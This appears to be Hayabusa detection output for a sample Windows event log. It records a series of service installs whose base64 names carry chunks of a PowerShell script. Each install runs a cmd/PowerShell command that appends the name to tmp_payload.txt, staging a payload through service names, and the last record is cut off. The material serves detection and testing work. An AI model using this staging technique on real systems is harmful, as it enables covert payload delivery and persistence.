2021-11-03 17:16:46.913 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:46.913 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:46.913 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:48.360 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:48.360 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:48.360 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:49.806 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:49.806 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:49.806 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:51.269 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:51.269 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:51.269 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:52.716 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:52.716 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:52.716 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:54.170 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:54.170 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:54.170 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:55.604 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:55.604 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:55.604 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:57.053 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:57.053 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:57.053 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:58.514 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:58.514 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:58.514 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:59.975 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:59.975 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:59.975 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:01.428 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:01.428 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c 
powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:01.428 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:02.892 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:02.892 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:02.892 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:04.364 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:04.364 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 
